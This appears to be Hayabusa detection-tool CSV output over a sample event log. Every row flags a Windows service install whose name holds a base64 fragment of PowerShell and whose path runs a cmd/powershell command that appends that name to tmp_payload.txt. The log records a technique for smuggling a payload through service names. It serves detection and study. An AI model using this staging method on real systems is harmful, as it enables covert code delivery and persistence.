+2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
